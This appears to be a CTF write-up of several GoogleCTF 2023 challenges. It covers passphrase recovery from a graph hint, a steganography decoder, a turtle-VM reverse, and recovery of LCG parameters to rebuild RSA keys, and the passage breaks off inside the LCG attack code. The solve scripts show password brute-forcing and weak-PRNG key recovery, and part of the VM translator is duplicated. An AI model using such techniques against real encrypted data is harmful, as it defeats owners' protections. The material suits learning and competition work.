GoogleCTF 2023 Writeup
Overview
Last weekend, I played GoogleCTF with b01lers. We ranked 55th in the end. I solved 2 misc, 1 rev, 1 crypto, and 3 pwn. This writeup will mostly focus on my own thought process while solving the challenges, and I’d recommand reading the official writeups as well.
Challenge solved after the competition are marked as [*]
Misc
npc
1
2
3
4
A friend handed me this map and told me that it will lead me to the flag.
It is confusing me and I don't know how to read it, can you help me out?
solves: 102
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
# Copyright 2023 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This file encrypts a given file using a generated, easy to remember password.
Additionally, it generates a hint in case you forgot the password.
"""
import dataclasses
import re
import secrets
import sys
from pyrage import passphrase
def get_word_list():
with open('USACONST.TXT', encoding='ISO8859') as f:
text = f.read()
return list(set(re.sub('[^a-z]', ' ', text.lower()).split()))
def generate_password(num_words):
word_list = get_word_list()
return ''.join(secrets.choice(word_list) for _ in range(num_words))
@dataclasses.dataclass
class Node:
letter: str
id: int
@dataclasses.dataclass
class Edge:
a: Node
b: Node
@dataclasses.dataclass
class Graph:
nodes: list[Node]
edges: list[Edge]
class IdGen:
def __init__(self):
self.ids = set()
def generate_id(self):
while True:
new_id = secrets.randbelow(1024**3)
if new_id not in self.ids:
self.ids.add(new_id)
return new_id
def generate_hint(password):
random = secrets.SystemRandom()
id_gen = IdGen()
graph = Graph([],[])
for letter in password:
graph.nodes.append(Node(letter, id_gen.generate_id()))
for a, b in zip(graph.nodes, graph.nodes[1:]):
graph.edges.append(Edge(a, b))
for _ in range(int(len(password)**1.3)):
a, b = random.sample(graph.nodes, 2)
graph.edges.append(Edge(a, b))
random.shuffle(graph.nodes)
random.shuffle(graph.edges)
for edge in graph.edges:
if random.random() % 2:
edge.a, edge.b = edge.b, edge.a
return graph
def write_hint(graph, out_file):
out_file.write('graph {\n')
for node in graph.nodes:
out_file.write(f' {node.id} [label={node.letter}];\n')
for edge in graph.edges:
out_file.write(f' {edge.a.id} -- {edge.b.id};\n')
out_file.write('}\n')
def encrypt(num_words, secret):
password = generate_password(num_words)
hint = generate_hint(password)
with open('hint.dot', 'w') as hint_file:
write_hint(hint, hint_file)
filename = 'secret.age'
with open(filename, 'wb') as f:
f.write(passphrase.encrypt(secret, password))
print(f'Your secret is now inside password-protected file {filename}.')
print(f'Use the password {password} to access it.')
print(
'In case you forgot the password, maybe hint.dot will help your memory.')
if __name__ == '__main__':
encrypt(num_words=int(sys.argv[1]), secret=sys.argv[2].encode('utf-8'))
In this challenge, the flag file is encrypted using a passphrase that generated from a wordlist. A hint.dot file is also provided. THe most import part is to identiy how the hint is generate.
In the encrypt.py file we can see that each letter is assigned a node, and each consecutive letters are link with a directly edge. Afterward, random edges are added, the node orders are shuffled, and the edge order are randomly flipped. Since there are a lot of randomness in the hint, all we can extract from the hint are what letters are in the passphrase, and what letters can be connected.
I parse the hint file and get the list of letters presented. I then treat all edges as bi-directional, and filter the words based on the following criteria.
- The letters in the word can be found in the passphrase
- There are edges between any two consecutive letter pairs
This filters the word list down to 86 words, I then randomly generates passphrase from that wordlist that have the same word sets as the passphrase. I then permutes that word sets and test all permutations until the correct passphrase is found. See solve.py for more detail.
I think that the word set phase can potentially be change to a more efficient approach, as that problem is similar to a subset sum, not sure if there are any potential in a more efficient algorithm.
CTF{S3vEn_bR1dg35_0f_K0eN1g5BeRg}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
import re
import random
import secrets
from tqdm import tqdm
import string
from sage.all import *
from pyrage import passphrase
from itertools import permutations
def get_word_list():
with open('USACONST.TXT', encoding='ISO8859') as f:
text = f.read()
return list(set(re.sub('[^a-z]', ' ', text.lower()).split()))
word_list = get_word_list()
def get_valid_nodes():
with open("hint.dot") as f:
header = f.readline()
tmp = f.readline()
nodes = {}
inv_nodes = {}
edges = []
while "label" in tmp:
node_id, letter = tmp.split('[label=')
letter = letter[0]
node_id = int(node_id)
nodes[node_id] = letter
if letter in inv_nodes:
inv_nodes[letter].append(node_id)
else:
inv_nodes[letter] = [node_id]
tmp = f.readline()
while "--" in tmp:
fid, tid = tmp.split('--')
fid = int(fid)
tid = int(tid[:-2]) # ;\n
edges.append((fid, tid))
edges.append((tid, fid)) # since it's randomly flipped, treat as non directional
tmp = f.readline()
return nodes, inv_nodes, edges
nodes, inv_nodes, edges = get_valid_nodes()
def path_exist(inv_map, edge, f, t):
for fr in inv_map[f]:
for dst in inv_map[t]:
if (fr, dst) in edge:
return True
# print(f, t)
return False
#print(n, e)
appeared_letter = list(nodes.values())
valid_words = []
for w in word_list:
if not all(i in appeared_letter for i in w):
continue
for l in w:
if w.count(l) > appeared_letter.count(l):
break
else:
for s, e in zip(w, w[1:]):
if not path_exist(inv_nodes, edges, s, e):
break
else:
valid_words.append(w)
print(valid_words)
print(len(appeared_letter))
print(len(valid_words))
verify = "".join(sorted(appeared_letter)).strip()
print(verify)
print(type(verify))
password_len = len(verify)
def generate_password(num_words):
word_list = valid_words
return ''.join(secrets.choice(word_list) for _ in range(num_words))
def word2vec(word):
return [word.count(l) for l in string.ascii_lowercase]
#verify = "aacddeeeeegiiinnnoorrrsssstt"
secret = open("secret.age", "rb").read()
for words in Subsets(valid_words):
password = "".join(words)
if len(password) != password_len:
continue
s_password = "".join(sorted(password))
# print(s_password)
# print(type(s_password), type(verify))
if s_password in verify:
print(password)
print(words)
for ws in permutations(words):
password = "".join(ws)
print(password)
for s, e in zip(password, password[1:]):
if not path_exist(inv_nodes, edges, s, e):
break
else:
try:
print(passphrase.decrypt(secret, password))
print("FOUND!!!!")
exit(1)
except Exception as e:
pass
#standardwatersigngivenchosen
#b'CTF{S3vEn_bR1dg35_0f_K0eN1g5BeRg}'
symatrix
1
2
3
4
5
The CIA has been tracking a group of hackers who communicate using PNG files embedded with a custom steganography algorithm.
An insider spy was able to obtain the encoder, but it is not the original code.
You have been tasked with reversing the encoder file and creating a decoder as soon as possible in order to read the most recent PNG file they have sent.
solves: 110
encoder.c (From googleCTF github)
The challenge comes with a large encoder.c file, this seems intimidating initially. However, reading through the code a little bit, we quickly found out that there are part of the original python file written in the comment. Using a simple parser I extracted the python source from encoder.c file. (My parser actually missed a else: line, and I manuelly added that afterward)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
f = open("encoder.c")
source = ["" for i in range(70)]
for line in f:
if "encoder.py" in line:
# print(line)
try:
line_number = int(line.split(':')[-1].split(" ")[0])
except Exception:
continue
# print(line_number)
for af in range(5):
temp = f.readline()
if "<<<<<" in temp:
source[line_number] = temp[3:-1].split("#")[0]
with open("encoder.py", "w") as f:
f.write("\n".join(source))
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
from PIL import Image
from random import randint
import binascii
def hexstr_to_binstr(hexstr):
n = int(hexstr, 16)
bstr = ''
while n > 0:
bstr = str(n % 2) + bstr
n = n >> 1
if len(bstr) % 8 != 0:
bstr = '0' + bstr
return bstr
def pixel_bit(b):
return tuple((0, 1, b))
def embed(t1, t2):
return tuple((t1[0] + t2[0], t1[1] + t2[1], t1[2] + t2[2]))
def full_pixel(pixel):
return pixel[1] == 255 or pixel[2] == 255
print("Embedding file...")
bin_data = open("./flag.txt", 'rb').read()
data_to_hide = binascii.hexlify(bin_data).decode('utf-8')
base_image = Image.open("./original.png")
x_len, y_len = base_image.size
nx_len = x_len * 2
new_image = Image.new("RGB", (nx_len, y_len))
base_matrix = base_image.load()
new_matrix = new_image.load()
binary_string = hexstr_to_binstr(data_to_hide)
remaining_bits = len(binary_string)
nx_len = nx_len - 1
next_position = 0
for i in range(0, y_len):
for j in range(0, x_len):
pixel = new_matrix[j, i] = base_matrix[j, i]
if remaining_bits > 0 and next_position <= 0 and not full_pixel(pixel):
new_matrix[nx_len - j, i] = embed(pixel_bit(int(binary_string[0])),pixel)
next_position = randint(1, 17)
binary_string = binary_string[1:]
remaining_bits -= 1
else:
new_matrix[nx_len - j, i] = pixel
next_position -= 1
new_image.save("./symatrix.png")
new_image.close()
base_image.close()
print("Work done!")
exit(1)
Base on the encoder.py file, it’s clear that the original image is mirrored, and the flag bit and embedded to the right half of the image. The pixel that are modifyed are always increamented by either (0, 1, 0) or (0, 1, 1), with the formar encoding 0 and the latter encoding 1. To decode the flag, we simply go through all the bytes, and extract those that are different left side v.s. right side. We can ignore the random offset since only the pixels that have data encoded are changed.
CTF{W4ke_Up_Ne0+Th1s_I5_Th3_Fl4g!}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
from PIL import Image
import binascii
from Crypto.Util.number import long_to_bytes
encoded_image = Image.open("./symatrix.png")
x_len, y_len = encoded_image.size
encoded_matrix = encoded_image.load()
center = x_len//2
flag_bits = ""
for i in range(0, y_len):
for j in range(0, x_len//2):
if encoded_matrix[j, i] == encoded_matrix[x_len-1-j, i]:
continue
else:
flag_bits += str(encoded_matrix[x_len-1-j, i][2] - encoded_matrix[j, i][2])
# print(flag_bits)
flag = long_to_bytes(int(flag_bits, 2))
print(flag)
Reverse
Turtle
1
2
3
Are we not all but turtles drifting in the sea, executing instructions as we stumble upon them?
solves: 27
turt.py (From googleCTF github)
This is a vm implemented using turtles! After watching the program run for a bit, we can observe what each turtle are responsible for. For example, the S turtle act like a stack, C is like code, and R is like some registers. Based on this knowledge, I write a translator (translate.py) from c.png “code” file to get a pseudocode (trans.txt) of the program. I notice that each 5 pixel movement for the turtle seems to be for 1 unit, so I translate a lot of the moving instructions into pointer arithmatic, as they are easier to work with.
With the translated pseudocode, we notice that the program first check for the flag format, then make sure all characters are unique, make sure the characters are in a specific order, and lastly run some function on each character.
It took a while to understand that the function is actually a binary search on the character value, and match each step with some value in memory. For example, if the target value is smallar than the current middle element, we first match if the memory value is 1, then call the same search function recursively. To recover the flag, I extract the reference value, take all the found characters, and order it using the reording in the memory. See simplify.txt for notes taken during the process, and solve.py for more detail.
CTF{iT5_E-tUr+1es/AlL.7h3;waY:d0Wn}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
from Crypto.Util.number import long_to_bytes, bytes_to_long
from sage.all import *
from PIL import Image
# M: Memory
# S: Stack
# R: Register
def loadM(flag):
global M
M = [(ord(i), 0, 0) for i in flag] + [(0, 0, 0) for i in range(200)]
def readM(a):
return f"M[{a}]"
def writeM(a, c):
print(f"M[{a}] = {c}")
sp = 0
def loadS():
global S
S = [(255, 128, 128) for i in range(240)]
sp = 120
def readS(a):
return f"S[sp+{a}]"
def writeS(a, c):
print(f"S[sp+{a}] = {c}")
def loadR():
global R
R = [(0, 0, 0) for i in range(9)]
def readR(a):
return f"R[{a}]"
def writeR(a, c):
print(f"R[{a}] = {c}")
def readRVal(rNum):
return readC(readR(rNum))
def getRNum(colorOrInt):
if type(colorOrInt) == tuple:
colorOrInt = colorOrInt[0]
return (colorOrInt-20) // 40
def read(op, isR, isP, isC):
if isP:
return readPVal(op, isR, isC)
elif isR:
return readRVal(getRNum(op))
elif isC:
return readC(op)
raise BaseException("invalid insn")
def write(op, val, isR, isP, isC):
if isP:
writePVal(op, val, isR, isC)
elif isR:
writeRVal(getRNum(op), val)
else:
raise BaseException("invalid insn")
def writeRVal(rNum, val):
writeR(rNum, cToColor(val))
def writePVal(op, val, isS, isC):
a = readPA(op, isC)
if isS:
writeS(a, cToColor(val))
else:
writeM(a, cToColor(val))
def readPVal(op, isS, isC):
a = readPA(op, isC)
if isS:
return readC(readS(a))
else:
return readC(readM(a))
def readPA(op, isC):
if isC:
return readC(op)
a = ""
if op[0] != 0:
a = readRVal(getRNum(op[0])) + " + "
if op[1] != 0:
a += readRVal(getRNum(op[1])) + " + "
a += readOneByteC(op[2])
return a
def readC(op):
if type(op) == str:
return op
c = op[0] + (op[1]<<8) + (op[2]<<16)
if c >= (256**3)//2:
c = -((256**3)-c)
return str(c)
def readOneByteC(val):
if val > 256//2:
return str(-(256-val))
return str(val)
def cToColor(val):
return f"{val}"
if val < 0:
val = 256**3 + val
return [val%256, (val>>8)%256, (val>>16)%256]
im = Image.open("c.png").convert("RGB")
w, h = im.size
#print(w, h)
px = im.load()
C = [[px[i, j] for i in range(3)] for j in range(h)]
C+= [[px[i, j] for i in range(3, 6)] for j in range(h)]
C+= [[px[i, j] for i in range(6, 9)] for j in range(h)]
#print(C)
im = Image.open("m.png").convert("RGB")
w, h = im.size
#print(w, h)
px = im.load()
M = [px[j, i] for i in range(h) for j in range(w)]
print([i[0] for i in M[65:95]])
print([i[0] for i in M[95:]])
#print(C)
ip = 0
def run():
global sp
for ip in range(h*3):
print(f"<{ip:04d}>: ", end="")
color0 = C[ip][0]
cmpcolor = (color0[0]&0xfc, color0[1]&0xfc, color0[2]&0xfc)
color1 = C[ip][1]
color2 = C[ip][2]
isR1 = color0[0]&1 != 0
isP1 = color0[1]&1 != 0
isC1 = color0[2]&1 != 0
isR2 = color0[0]&2 != 0
isP2 = color0[1]&2 != 0
ip = 0
def run():
global sp
for ip in range(h*3):
print(f"<{ip:04d}>: ", end="")
color0 = C[ip][0]
cmpcolor = (color0[0]&0xfc, color0[1]&0xfc, color0[2]&0xfc)
color1 = C[ip][1]
color2 = C[ip][2]
isR1 = color0[0]&1 != 0
isP1 = color0[1]&1 != 0
isC1 = color0[2]&1 != 0
isR2 = color0[0]&2 != 0
isP2 = color0[1]&2 != 0
isC2 = color0[2]&2 != 0
if cmpcolor == (0,252,0):
print("print('correct flag!')")
elif cmpcolor == (252,0,0):
print("print('wrong flag :C')")
elif cmpcolor == (204, 204, 252):
print(f"sp += {readC(color1)}")
elif cmpcolor == (220, 252, 0) or cmpcolor == (252, 188, 0) or cmpcolor == (64, 224, 208) or cmpcolor == (156, 224, 188) or cmpcolor == (100, 148, 236) or cmpcolor == (252, 124, 80):
if cmpcolor == (252, 188, 0):
val2 = readPA(color2, isC2)
else:
val2 = read(color2, isR2, isP2, isC2)
if cmpcolor == (220, 252, 0) or cmpcolor == (252, 188, 0):
write(color1, val2, isR1, isP1, isC1)
elif cmpcolor == (64, 224, 208):
val1 = read(color1, isR1, isP1, isC1)
write(color1, val1+" + "+val2, isR1, isP1, isC1)
elif cmpcolor == (156, 224, 188):
val1 = read(color1, isR1, isP1, isC1)
write(color1, val1+" - "+val2, isR1, isP1, isC1)
elif cmpcolor == (100, 148, 236):
val1 = read(color1, isR1, isP1, isC1)
write(color1, val1+">>"+val2, isR1, isP1, isC1)
elif cmpcolor == (252, 124, 80):
val1 = read(color1, isR1, isP1, isC1)
print(f"cmp {val1} {val2}")
# writeRVal(6, 16581630 if (val1 == val2) else 0)
# writeRVal(7, 16581630 if (val1 < val2) else 0)
# writeRVal(8, 16581630 if (val1 > val2) else 0)
elif cmpcolor == (220, 48, 96):
# e = readRVal(6)
# l = readRVal(7)
# g = readRVal(8)
op = "j"
if color0[0]&2 != 0:
op+= "l"
if color0[1]&2 != 0:
op+= "g"
if color0[0]&1 != 0:
op+= "e"
if color0[1]&1 != 0:
op+= "ne"
if op == "jlgene":
op = "jmp"
dest = f"{op} {ip}+{readC(color1)}-1"
offset = f"{ip} + {readC(color1)}-1"
try:
offset_num = eval(offset)
print(f"{op} <{offset_num:04d}>")
except:
print(dest)
elif cmpcolor == (252, 0, 252):
jmp = ((color1[0])//3)*h - color1[1] - 1
print(f"call <{ip+jmp:04d}>")
# writeS(0, (color1[0], color1[1], 127))
elif cmpcolor == (128, 0, 128):
print("ret")
else:
print()
run()
<0000>: sp += -83
<0001>: R[2] = M[0]
<0002>: cmp R[2] 67
<0003>: jne <0015>
<0004>: R[2] = M[1]
<0005>: cmp R[2] 84
<0006>: jne <0015>
<0007>: R[2] = M[2]
<0008>: cmp R[2] 70
<0009>: jne <0015>
<0010>: R[2] = M[3]
<0011>: cmp R[2] 123
<0012>: jne <0015>
<0013>: R[2] = M[34]
<0014>: cmp R[2] 125
<0015>: je <0016>
<0016>: print('wrong flag :C')
<0017>: S[sp+1] = 0
<0018>: cmp S[sp+1] 79
<0019>: jg <0023>
<0020>: R[2] = S[sp+1]
<0021>: S[sp+R[2] + 3] = 0
<0022>: S[sp+1] = S[sp+1] + 1
<0023>: jmp <0017>
<0024>: S[sp+2] = 4
<0025>: R[2] = S[sp+2]
<0026>: cmp R[2] 28
<0027>: jg <0053>
<0028>: R[2] = S[sp+2]
<0029>: R[5] = 0
<0030>: R[2] = M[R[2] + R[5] + 0]
<0031>: cmp R[2] 42
<0032>: jle <0037>
<0033>: R[2] = S[sp+2]
<0034>: R[5] = 0
<0035>: R[2] = M[R[2] + R[5] + 0]
<0036>: cmp R[2] 122
<0037>: jle <0038>
<0038>: print('wrong flag :C')
<0039>: R[2] = S[sp+2]
<0040>: R[5] = 0
<0041>: R[2] = M[R[2] + R[5] + 0]
<0042>: R[2] = R[2] - 43
<0043>: R[2] = S[sp+R[2] + 3]
<0044>: cmp R[2] 65535
<0045>: jne <0046>
<0046>: print('wrong flag :C')
<0047>: R[2] = S[sp+2]
<0048>: R[5] = 0
<0049>: R[2] = M[R[2] + R[5] + 0]
<0050>: R[2] = R[2] - 43
<0051>: S[sp+R[2] + 3] = 65535
<0052>: S[sp+2] = S[sp+2] + 1
<0053>: jmp <0024>
<0054>: call <0082>
<0055>: M[519] = 0
<0056>: S[sp+0] = 43
<0057>: cmp S[sp+0] 122
<0058>: jg <0067>
<0059>: R[2] = S[sp+0]
<0060>: R[5] = 30
<0061>: R[0] = 35
<0062>: R[1] = R[2]
<0063>: call <0165>
<0064>: R[2] = S[sp+0]
<0065>: R[2] = R[2] + 1
<0066>: S[sp+0] = R[2]
<0067>: jmp <0056>
<0068>: print('correct flag!')
<0069>:
<0070>:
<0071>:
<0072>:
<0073>:
<0074>:
<0075>:
<0076>:
<0077>:
<0078>:
<0079>:
<0080>:
<0081>:
<0082>:
<0083>: R[2] = 4
<0084>: S[sp+-2] = R[2]
<0085>: S[sp+-3] = 0
<0086>: R[2] = S[sp+-3]
<0087>: cmp R[2] 29
<0088>: jg <0100>
<0089>: R[2] = S[sp+-3]
<0090>: R[5] = R[2]
<0091>: R[2] = S[sp+-2]
<0092>: R[5] = R[5] + R[2]
<0093>: R[2] = S[sp+-3]
<0094>: R[4] = 65
<0095>: R[2] = M[R[2] + R[4] + 0]
<0096>: R[5] = M[R[5] + 0]
<0097>: R[4] = 35
<0098>: M[R[2] + R[4] + 0] = R[5]
<0099>: S[sp+-3] = S[sp+-3] + 1
<0100>: jmp <0085>
<0101>: ret
<0102>:
<0103>:
<0104>:
<0105>:
<0106>:
<0107>:
<0108>:
<0109>:
<0110>:
<0111>:
<0112>:
<0113>:
<0114>:
<0115>:
<0116>:
<0117>:
<0118>:
<0119>:
<0120>:
<0121>:
<0122>:
<0123>:
<0124>:
<0125>:
<0126>:
<0127>:
<0128>:
<0129>:
<0130>:
<0131>:
<0132>:
<0133>:
<0134>:
<0135>:
<0136>:
<0137>:
<0138>:
<0139>:
<0140>:
<0141>:
<0142>:
<0143>:
<0144>:
<0145>:
<0146>:
<0147>:
<0148>:
<0149>:
<0150>:
<0151>:
<0152>:
<0153>:
<0154>:
<0155>:
<0156>:
<0157>:
<0158>:
<0159>:
<0160>:
<0161>:
<0162>:
<0163>:
<0164>:
<0165>:
<0166>: sp += -4
<0167>: R[4] = R[1]
<0168>: S[sp+0] = R[0]
<0169>: R[2] = R[5]
<0170>: R[5] = R[4]
<0171>: S[sp+2] = R[5]
<0172>: S[sp+1] = R[2]
<0173>: R[2] = M[519]
<0174>: cmp R[2] 424
<0175>: jne <0176>
<0176>: print('wrong flag :C')
<0177>: cmp S[sp+1] 0
<0178>: jne <0186>
<0179>: R[2] = M[519]
<0180>: R[5] = R[2] + 1
<0181>: M[519] = R[5]
<0182>: R[5] = 95
<0183>: R[2] = M[R[2] + R[5] + 0]
<0184>: cmp R[2] 4
<0185>: je <0246>
<0186>: print('wrong flag :C')
<0187>: R[2] = S[sp+1]
<0188>: R[2] = R[2] - 1
<0189>: R[2] = R[2]>>1
<0190>: S[sp+3] = R[2]
<0191>: R[5] = S[sp+3]
<0192>: R[2] = S[sp+0]
<0193>: R[2] = R[2] + R[5]
<0194>: R[2] = M[R[2] + 0]
<0195>: cmp S[sp+2] R[2]
<0196>: jge <0211>
<0197>: R[2] = M[519]
<0198>: R[5] = R[2] + 1
<0199>: M[519] = R[5]
<0200>: R[5] = 95
<0201>: R[2] = M[R[2] + R[5] + 0]
<0202>: cmp R[2] 1
<0203>: je <0204>
<0204>: print('wrong flag :C')
<0205>: R[5] = S[sp+3]
<0206>: R[2] = S[sp+2]
<0207>: R[4] = S[sp+0]
<0208>: R[0] = R[4]
<0209>: R[1] = R[2]
<0210>: call <0165>
<0211>: jmp <0246>
<0212>: R[5] = S[sp+3]
<0213>: R[2] = S[sp+0]
<0214>: R[2] = R[2] + R[5]
<0215>: R[2] = M[R[2] + 0]
<0216>: cmp S[sp+2] R[2]
<0217>: jle <0238>
<0218>: R[2] = M[519]
<0219>: R[5] = R[2] + 1
<0220>: M[519] = R[5]
<0221>: R[5] = 95
<0222>: R[2] = M[R[2] + R[5] + 0]
<0223>: cmp R[2] 2
<0224>: je <0225>
<0225>: print('wrong flag :C')
<0226>: R[2] = S[sp+1]
<0227>: R[2] = R[2] - S[sp+3]
<0228>: R[2] = R[2] - 1
<0229>: R[5] = R[2]
<0230>: R[2] = S[sp+3]
<0231>: R[4] = R[2] + 1
<0232>: R[2] = S[sp+0]
<0233>: R[4] = R[4] + R[2]
<0234>: R[2] = S[sp+2]
<0235>: R[0] = R[4]
<0236>: R[1] = R[2]
<0237>: call <0165>
<0238>: jmp <0246>
<0239>: R[2] = M[519]
<0240>: R[5] = R[2] + 1
<0241>: M[519] = R[5]
<0242>: R[5] = 95
<0243>: R[2] = M[R[2] + R[5] + 0]
<0244>: cmp R[2] 3
<0245>: je <0246>
<0246>: print('wrong flag :C')
<0247>: sp += 4
<0248>: ret
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
M[0] = 67
M[1] = 84
M[2] = 70
M[3] = 123
M[4] = 125
for i in range(80):
S[sp+i+3] = 0
len = 80
for j in range(4, 29):
#M[j] in {42, 122}
#all letter in this set is unique
for j in range(29):
res = [0 for i in range(30)]
shuffle = [23, 14, 7, 18, 12, 1, 28, 15, 26, 0, 5, 21, 27, 3, 11, 24, 13, 2, 8, 22, 6, 10, 29, 19, 17, 9, 20, 4, 16, 25]
res[shuffle[j]] = M[j+4]
t = 0
def check(a, b, c):
if t==424:
print('wrong flag :target')
if len == 0:
R[2] = M[t + 95]
t = t + 1
if R[2] == 4:
return
else:
print('wrong flag :target')
mid_len = (len-1)//2
mid_point = st + mid_len
if target < M[mid_point]:
R[2] = M[t + 95]
t = t + 1
if R[2] == 1:
return
else:
print('wrong flag :target')
check(st, target, mid_len)
elif target > M[mid_point]:
R[2] = M[t + 95]
t = t + 1
if R[2] == 2:
return
else:
print('wrong flag :target')
check(st+mid_len+1, target, len - mid_len - 1)
else:
R[2] = M[t + 95]
t = t + 1
if R[2] == 3:
return
else:
print('wrong flag :target')
return
for i in range(43, 122):
check(35, i, 30) #R0, R1, R5
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
from PIL import Image
im = Image.open("m.png").convert("RGB")
w, h = im.size
#print(w, h)
px = im.load()
M = [px[j, i] for i in range(h) for j in range(w)]
ordering = [i[0] for i in M[65:95]]
finding = [i[0] for i in M[95:95+424]]
chars = [i for i in range(43, 123)]
finding = [4-i for i in finding if i in [3, 4]]
flag = ""
for i in range(len(chars)):
if finding[i] == 1:
flag+=chr(chars[i])
flag = "".join([flag[i] for i in ordering])
print("CTF{"+flag+"}")
Crypto
Least Common Genominator?
1
2
3
Someone used this program to send me an encrypted message but I can't read it! It uses something called an LCG, do you know what it is? I dumped the first six consecutive values generated from it but what do I do with it?!
solves: 352
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
from secret import config
from Crypto.PublicKey import RSA
from Crypto.Util.number import bytes_to_long, isPrime
class LCG:
lcg_m = config.m
lcg_c = config.c
lcg_n = config.n
def __init__(self, lcg_s):
self.state = lcg_s
def next(self):
self.state = (self.state * self.lcg_m + self.lcg_c) % self.lcg_n
return self.state
if __name__ == '__main__':
assert 4096 % config.it == 0
assert config.it == 8
assert 4096 % config.bits == 0
assert config.bits == 512
# Find prime value of specified bits a specified amount of times
seed = 211286818345627549183608678726370412218029639873054513839005340650674982169404937862395980568550063504804783328450267566224937880641772833325018028629959635
lcg = LCG(seed)
primes_arr = []
dump = True
items = 0
dump_file = open("dump.txt", "w")
primes_n = 1
while True:
for i in range(config.it):
while True:
prime_candidate = lcg.next()
if dump:
dump_file.write(str(prime_candidate) + '\n')
items += 1
if items == 6:
dump = False
dump_file.close()
if not isPrime(prime_candidate):
continue
elif prime_candidate.bit_length() != config.bits:
continue
else:
primes_n *= prime_candidate
primes_arr.append(prime_candidate)
break
# Check bit length
if primes_n.bit_length() > 4096:
print("bit length", primes_n.bit_length())
primes_arr.clear()
primes_n = 1
continue
else:
break
# Create public key 'n'
n = 1
for j in primes_arr:
n *= j
print("[+] Public Key: ", n)
print("[+] size: ", n.bit_length(), "bits")
# Calculate totient 'Phi(n)'
phi = 1
for k in primes_arr:
phi *= (k - 1)
# Calculate private key 'd'
d = pow(config.e, -1, phi)
# Generate Flag
assert config.flag.startswith(b"CTF{")
assert config.flag.endswith(b"}")
enc_flag = bytes_to_long(config.flag)
assert enc_flag < n
# Encrypt Flag
_enc = pow(enc_flag, config.e, n)
with open ("flag.txt", "wb") as flag_file:
flag_file.write(_enc.to_bytes(n.bit_length(), "little"))
# Export RSA Key
rsa = RSA.construct((n, config.e))
with open ("public.pem", "w") as pub_file:
pub_file.write(rsa.exportKey().decode())
This challenge is first generates p and q using a lcg, then use the p and q generated to encrypted the flag using rsa. Notice that the seed for lcg is provided, and the first 6 output of the lcg is provided. Therefore, if we recover the parameters for lcg, we can re-generate the same p and q from the program, and decrypt rsa accordingly.
While recovering m and c is trivial, recovering n is harder. I found this script and modify it a bit since the modulus end up not being a prime. After recoving the parameters, the rest of the solve are straight forward.
CTF{C0nGr@tz_RiV35t_5h4MiR_nD_Ad13MaN_W0ulD_b_h@pPy}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
from math import gcd
from sage.all import GF, Zmod
from sage.all import is_prime_power
from Crypto.PublicKey import RSA
from Crypto.Util.number import bytes_to_long, isPrime, long_to_bytes
# https://github.com/jvdsn/crypto-attacks/blob/master/attacks/lcg/parameter_recovery.py
# with some modification
def attack(y, m=None, a=None, c=None):
"""
Recovers the parameters from a linear congruential generator.
